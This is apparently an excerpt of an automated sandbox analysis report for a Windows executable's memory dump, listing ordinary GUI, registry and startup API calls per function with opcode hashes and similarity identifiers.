                                                                                • Instruction Fuzzy Hash: 9C2127767012281FE700AB58FC45DBF339CEB85325F85453FFC15C2221EA2AD55982AA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetMenuCheckMarkDimensions.USER32 ref: 00430913
                                                                                • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 004309C2
                                                                                • LoadBitmapA.USER32 ref: 004309DA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
                                                                                • String ID:
                                                                                • API String ID: 2596413745-3916222277
                                                                                • Opcode ID: dd745643b7141e934c58812f09dc6b270792f28580d610317db31495c312f8d3
                                                                                • Instruction ID: a3533d82a735d42b2dae822d5789ddc69112ffb21bb1f2af66eb5820fdf03c5c
                                                                                • Opcode Fuzzy Hash: dd745643b7141e934c58812f09dc6b270792f28580d610317db31495c312f8d3
                                                                                • Instruction Fuzzy Hash: EC213A71E00219AFEB10CF78DD95BAEBBB8EF84311F0452A6E505EB282D7749B44CB44
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetWindowLongA.USER32 ref: 0042FDF7
                                                                                • GetClassNameA.USER32(00000000,?,0000000A), ref: 0042FE12
                                                                                • lstrcmpiA.KERNEL32(?,combobox), ref: 0042FE21
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ClassLongNameWindowlstrcmpi
                                                                                • String ID: combobox
                                                                                • API String ID: 2054663530-2240613097
                                                                                • Opcode ID: 7208318ca68a3f5f4755e030604189664579df9a8236ce2ddd85f4ab1c1307fe
                                                                                • Instruction ID: 04ee319803db6a04d27ded42bad46c4062b8da0fb439852a21cb309efd9e796d
                                                                                • Opcode Fuzzy Hash: 7208318ca68a3f5f4755e030604189664579df9a8236ce2ddd85f4ab1c1307fe
                                                                                • Instruction Fuzzy Hash: 61E0E531614109BBCF119F70EC0AE9E3BB8AB00302F50C231B812D61A0EB74D2588688
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetPropA.USER32 ref: 00429746
                                                                                • CallWindowProcA.USER32 ref: 00429771
                                                                                  • Part of subcall function 00426C80: CallWindowProcA.USER32 ref: 00426CA6
                                                                                  • Part of subcall function 00426C80: RemovePropA.USER32 ref: 00426CBE
                                                                                  • Part of subcall function 00426C80: RemovePropA.USER32 ref: 00426CCA
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Prop$CallProcRemoveWindow
                                                                                • String ID:
                                                                                • API String ID: 2276450057-0
                                                                                • Opcode ID: 86c7fc6ee46c35901c867c10044e382f601ecfd1abd8370f5c457ff39019c19e
                                                                                • Instruction ID: 6d8e189070865e50eb5a0125cec9133d6ebd97089a4d7b211e56e48425280b1a
                                                                                • Opcode Fuzzy Hash: 86c7fc6ee46c35901c867c10044e382f601ecfd1abd8370f5c457ff39019c19e
                                                                                • Instruction Fuzzy Hash: 8831F776B10220ABD610AE15FC859AFB398EFD6B35FC4052BF90453241D72DAE49826F
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 004303C1: GetParent.USER32(?), ref: 004303F4
  • Part of subcall function 004303C1: GetLastActivePopup.USER32(?), ref: 00430403
  • Part of subcall function 004303C1: IsWindowEnabled.USER32(?), ref: 00430418
  • Part of subcall function 004303C1: EnableWindow.USER32(?,00000000), ref: 0043042B
• SendMessageA.USER32 ref: 0043027F
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 004302ED
• MessageBoxA.USER32 ref: 004302FB
• EnableWindow.USER32(00000000,00000001), ref: 00430317
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID: Window$EnableMessage$ActiveEnabledFileLastModuleNameParentPopupSend
• String ID:
• API String ID: 1958756768-0
• Opcode ID: 62c385102f6778a129e4fd6e660d15a9cd4b94e955f9dde623250355da779e75
• Instruction ID: e704a840c2d638f7fab2b38e9494cffd4b89029d8ea40933ad924e25a40fe41f
• Opcode Fuzzy Hash: 62c385102f6778a129e4fd6e660d15a9cd4b94e955f9dde623250355da779e75
• Instruction Fuzzy Hash: A121D672900208AFDB209F95CCD9BEFB7B9FB48700F2412AAF611E7280C7789D408B54
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetVersion.KERNEL32 ref: 00422C75
  • Part of subcall function 00424A8D: HeapCreate.KERNELBASE(00000000,00001000,00000000,00422CAD,00000001), ref: 00424A9E
  • Part of subcall function 00424A8D: HeapDestroy.KERNEL32 ref: 00424ABC
• GetCommandLineA.KERNEL32 ref: 00422CD5
• GetStartupInfoA.KERNEL32(?), ref: 00422D00
• GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00422D23
  • Part of subcall function 00422D7C: ExitProcess.KERNEL32 ref: 00422D99
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
• String ID:
• API String ID: 2057626494-0
• Opcode ID: 5a598c80328aa6dc8baaed519336eeddf2bb376c32c240e30c956057d23bc4ac
• Instruction ID: 14cb5e89c1199372d53d1cb2a10a980279646cf1080a39ab060e5aa405f6d556
• Opcode Fuzzy Hash: 5a598c80328aa6dc8baaed519336eeddf2bb376c32c240e30c956057d23bc4ac
• Instruction Fuzzy Hash: DB21E6B0A00324AEDB18AFA6BC06B6E77B8EF45714F50042FF50197291DB7C4440CB5C
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessagePropSend$Remove
• String ID:
• API String ID: 2793251306-0
• Opcode ID: b9cfce401f17aa31cfb29ccd402e4a82264f25bb83de7431e2aff57b39af9e2c
• Instruction ID: 1fe094588a0e961be141cfb79aa9b7f3fec2b3763f547fbcd9ce51cabbcc919e
• Opcode Fuzzy Hash: b9cfce401f17aa31cfb29ccd402e4a82264f25bb83de7431e2aff57b39af9e2c
• Instruction Fuzzy Hash: 741154796042117EE200AB15AC05FABB398EF95765F404429FD1492240E778A94A8BAF
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetWindow.USER32(?,00000005), ref: 004275F3
• GetWindow.USER32(00000000,00000005), ref: 0042760F
• GetWindow.USER32(00000000,00000002), ref: 00427625
• GetWindow.USER32(00000000,00000002), ref: 00427630
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Window
• String ID:
• API String ID: 2353593579-0
• Opcode ID: 0c8130be8dbde7bc21ddb6305222a4dfbe05682fe96a044a3176c088959609aa
• Instruction ID: 7973c777c7684f649d9f1fe3c027d690b52e0caa17278d6769f24246e1f79e53
• Opcode Fuzzy Hash: 0c8130be8dbde7bc21ddb6305222a4dfbe05682fe96a044a3176c088959609aa
• Instruction Fuzzy Hash: 44F0F46330971232D221656E3C8AF6BBB988BE1F61F80003BF20096282FE59C805423D
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Hook$CallLongMessageNextSendUnhookWindowWindows
• String ID:
• API String ID: 4187046592-0
• Opcode ID: fc15d09849e8097207f4dcf02ca075e96df04ae3ebb25c062f27d6495c69d0ce
• Instruction ID: 4b643680d531ce21709dbc3d3d9936dd58ebad54b3506d151bcb09dffef7e68c
• Opcode Fuzzy Hash: fc15d09849e8097207f4dcf02ca075e96df04ae3ebb25c062f27d6495c69d0ce
• Instruction Fuzzy Hash: 01114679600210AFE214DF19EC49E577BE9FB89311F80897EFA45C32A0D7B4E844CB19
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetWindow.USER32(?,00000005), ref: 004276F5
• GetWindowLongA.USER32 ref: 00427702
• SetTextColor.GDI32(?,00000000), ref: 0042771F
• SetBkColor.GDI32(?,00000000), ref: 0042772D
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ColorWindow$LongText
• String ID:
• API String ID: 3945788684-0
• Opcode ID: d117eeae12befd817f81a42662413f153beabfd8ab81fdc14de5bd2b65c25d18
• Instruction ID: e9e0c078f4f095c576031995d216991a795bed2baff42fc2bf4ce7406c29b5fa
• Opcode Fuzzy Hash: d117eeae12befd817f81a42662413f153beabfd8ab81fdc14de5bd2b65c25d18
• Instruction Fuzzy Hash: DA01B53631E1209BDB20DB64BC48DDB7754F7A2321F51493BF441C3190D618AA42C26E
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentThreadId.KERNEL32 ref: 00427076
• EnterCriticalSection.KERNEL32(0044E660), ref: 00427083
• UnhookWindowsHookEx.USER32(?), ref: 004270C6
• LeaveCriticalSection.KERNEL32(0044E660), ref: 0042710B
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CriticalSection$CurrentEnterHookLeaveThreadUnhookWindows
• String ID:
• API String ID: 1197249173-0
• Opcode ID: b526f28ec88201e747763d545dd85fe99f5833e47907bcd38130007adc8c3076
• Instruction ID: 1d88796f88b6287541be23973861e02c99c105cf5f3fe9de7b99daef2b075597
• Opcode Fuzzy Hash: b526f28ec88201e747763d545dd85fe99f5833e47907bcd38130007adc8c3076
• Instruction Fuzzy Hash: B911CE74204658CFD720DF2AF844A6A73B5FB21302FC2457BF50683261DB7AA895CB6D
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Window$MessageSend
• String ID:
• API String ID: 1496643700-0
• Opcode ID: 3b76b733c8a065dc6ece5aa5bab190c52c855fea594cedea1f79651ef2b1cb83
• Instruction ID: e6c9ddb7f09297e24d387d9ccb7d5983debcd3fb8e4fafe036d0fe851a1ef5ff
• Opcode Fuzzy Hash: 3b76b733c8a065dc6ece5aa5bab190c52c855fea594cedea1f79651ef2b1cb83
• Instruction Fuzzy Hash: 50014032100229BBCF126F92AC44EDF3B26EF09352F448022FE1155160C73AC931EBE9
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Window$Item
• String ID:
• API String ID: 369458955-0
• Opcode ID: 905548e616ebf9b7f01c7a7c30a2917865fe36aa6cdc49e37fce1b3057b69f02
• Instruction ID: ba454663a5bc4973feb4871b6fad6446c384b15e901a80391e672636eb6377ff
• Opcode Fuzzy Hash: 905548e616ebf9b7f01c7a7c30a2917865fe36aa6cdc49e37fce1b3057b69f02
• Instruction Fuzzy Hash: 42018432201235A7CB223F62BC44A9F7758AF44756F44C032FD0091110D739C91196ED
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Item$EnableFocusMenuNextParent
• String ID:
• API String ID: 988757621-0
• Opcode ID: 49aa1afeb8f5b243dd53646bf734e1264a88fea6aedff110ede8a8f0e90f70fa
• Instruction ID: 82d9ef6b61968b264c5194fceab843e61d0be6a46d3b9ec2fbe04c224fb07a28
• Opcode Fuzzy Hash: 49aa1afeb8f5b243dd53646bf734e1264a88fea6aedff110ede8a8f0e90f70fa
• Instruction Fuzzy Hash: 1211A170610A109FDB299F25EC19B6BB7B5EF40715F548A6EF152831A0CB78E881CB98
Uniqueness

Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 004272B6
                                                                                • EnterCriticalSection.KERNEL32(0044E660), ref: 004272C3
                                                                                • UnhookWindowsHookEx.USER32(?), ref: 004272FA
                                                                                • LeaveCriticalSection.KERNEL32(0044E660), ref: 00427339
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CriticalSection$CurrentEnterHookLeaveThreadUnhookWindows
                                                                                • String ID:
                                                                                • API String ID: 1197249173-0
                                                                                • Opcode ID: a80b8c0cc45658d9d96590c75b3bca3cd5df597524dda87c94283b0c11b01651
                                                                                • Instruction ID: 804b54161b112c52b27582448d90f526dafddecbff0a4d3454560e8264dfc497
                                                                                • Opcode Fuzzy Hash: a80b8c0cc45658d9d96590c75b3bca3cd5df597524dda87c94283b0c11b01651
                                                                                • Instruction Fuzzy Hash: D001B57520461C8FD720DF6AF844A6A73A4F721302FC205BAE90683150E735A951DF58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 0043056A
                                                                                • RegCloseKey.ADVAPI32(00000000,?,?), ref: 00430573
                                                                                • wsprintfA.USER32 ref: 0043058F
                                                                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 004305A8
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ClosePrivateProfileStringValueWritewsprintf
                                                                                • String ID:
                                                                                • API String ID: 1902064621-0
                                                                                • Opcode ID: 5d9834ed028593e6228c507318c193ed456161fe9bc6e098289be67986216517
                                                                                • Instruction ID: a302ace364950ebbacf57e9a1ca98f35e01bce7b99a5336a218e87213a5c3b82
                                                                                • Opcode Fuzzy Hash: 5d9834ed028593e6228c507318c193ed456161fe9bc6e098289be67986216517
                                                                                • Instruction Fuzzy Hash: 2E01A232440219BFCB129F64DC05FEB3BB9AF08725F045526FA11D6060D774C650CB88
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetObjectA.GDI32(00000000,0000000C,?), ref: 0042CEE4
                                                                                • SetBkColor.GDI32(00000000,00000000), ref: 0042CEF0
                                                                                • GetSysColor.USER32(00000008), ref: 0042CF00
                                                                                • SetTextColor.GDI32(00000000,?), ref: 0042CF0A
                                                                                  • Part of subcall function 0042FDE6: GetWindowLongA.USER32 ref: 0042FDF7
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Color$LongObjectTextWindow
                                                                                • String ID:
                                                                                • API String ID: 2871169696-0
                                                                                • Opcode ID: f382a1cc379d1b8ff616fb7cc4ceb1e2396075119803a9ce0110f24f19010e9e
                                                                                • Instruction ID: fcae4d56d620289676d5e110a269507cbca609aa6386b23e779b5878349a6538
                                                                                • Opcode Fuzzy Hash: f382a1cc379d1b8ff616fb7cc4ceb1e2396075119803a9ce0110f24f19010e9e
                                                                                • Instruction Fuzzy Hash: 9B016D30200118BBDF219F64FEC9BAF3B76AB04391F914522F912C61E4C7B8CD90CA69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetClientRect.USER32 ref: 00402868
                                                                                • GetSystemMetrics.USER32 ref: 00402870
                                                                                • GetSystemMetrics.USER32 ref: 00402885
                                                                                • InvalidateRect.USER32(00000000,?,00000001,?,00401B44,FFFFFFB7,00000001), ref: 004028AC
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: MetricsRectSystem$ClientInvalidate
                                                                                • String ID:
                                                                                • API String ID: 1762366858-0
                                                                                • Opcode ID: 063495eb32c4c5b4f6b9d6c15002a58220cf0273f99b4b24a4f50ef27cbf055f
                                                                                • Instruction ID: f779e5217fbf947dbec22688a3cc3a8211e8b536dd80d4325fa1e9902a4fdb8e
                                                                                • Opcode Fuzzy Hash: 063495eb32c4c5b4f6b9d6c15002a58220cf0273f99b4b24a4f50ef27cbf055f
                                                                                • Instruction Fuzzy Hash: A201A875600208EFD704DF98D988AAA7BB5FB88351F14C158FD098B395CA75EE81CF94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: TextWindow$lstrcmplstrlen
                                                                                • String ID:
                                                                                • API String ID: 330964273-0
                                                                                • Opcode ID: 918e3acf9e94d59409ae996563e8c5bb62672b90b12cfe0fde6d4385fb5baee6
                                                                                • Instruction ID: 8e6d11570b8ce11b172cb89db83b30c0780367cdce52d8cc2af1e92033d5dd16
                                                                                • Opcode Fuzzy Hash: 918e3acf9e94d59409ae996563e8c5bb62672b90b12cfe0fde6d4385fb5baee6
                                                                                • Instruction Fuzzy Hash: 11F01236500018BBDF226F64EC08ADF7B79FB09362F408172F849D5120D774CE948B94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetCPInfo.KERNEL32(?,00000000), ref: 004235A9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Info
                                                                                • String ID: $
                                                                                • API String ID: 1807457897-3032137957
                                                                                • Opcode ID: f222b232fef16415c30678ad8ef91520bf46dadd03e1af0c2b2d4a81457ea529
                                                                                • Instruction ID: fb0fe3ba0ffb0af075cd4e2988264672a84fbfd18e34bcf4f51c6b1cd9466352
                                                                                • Opcode Fuzzy Hash: f222b232fef16415c30678ad8ef91520bf46dadd03e1af0c2b2d4a81457ea529
                                                                                • Instruction Fuzzy Hash: 43417A312041782AEB219B15ED4ABEB7FBDEB06709F5804E6D585C7253C23D4B44CBAB
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetOpenFileNameA.COMDLG32(0000004C), ref: 00421444
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileNameOpen
                                                                                • String ID: $L
                                                                                • API String ID: 2203442278-1234072559
                                                                                • Opcode ID: 4736dc1b3d7b87e6390852a3d56834295071ca43c1119826cff9388d23b4c44a
                                                                                • Instruction ID: e5c4556a4fc19836bacf0eecf2f74134e8ef6d3b2efadf20e33fee31bfd061bf
                                                                                • Opcode Fuzzy Hash: 4736dc1b3d7b87e6390852a3d56834295071ca43c1119826cff9388d23b4c44a
                                                                                • Instruction Fuzzy Hash: 5821A2B0E0125C9FDB04DFD4D84479DFBB5BF48304F60416AD409AB394D7795949CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetPropA.USER32 ref: 0040210A
                                                                                  • Part of subcall function 00402296: ScreenToClient.USER32 ref: 004022E4
                                                                                  • Part of subcall function 00402296: PtInRect.USER32(00000000,00000000,00000084), ref: 004022FE
                                                                                • CallWindowProcA.USER32 ref: 00402152
                                                                                Strings
                                                                                • ___CResizeCtrl___Class___, xrefs: 00402101
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CallClientProcPropRectScreenWindow
                                                                                • String ID: ___CResizeCtrl___Class___
                                                                                • API String ID: 1382046119-3260620844
                                                                                • Opcode ID: f660d251a43cb1359749e2853ce4d586b2b24f75575abb44e41476efb81de708
                                                                                • Instruction ID: 696eb42a7d0fa06531ce0648a6a7044e0283508fe09d46f4eb69b048210bbe71
                                                                                • Opcode Fuzzy Hash: f660d251a43cb1359749e2853ce4d586b2b24f75575abb44e41476efb81de708
                                                                                • Instruction Fuzzy Hash: 6801C875A04208FFCB04DF98D984E9EBBB9AF8C311F1081A9F919A7384D774AE51CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetClassNameA.USER32(?,?,00000010), ref: 0042849E
                                                                                • lstrcmpA.KERNEL32(?,ComboBox,?,00000010), ref: 004284AE
                                                                                Strings
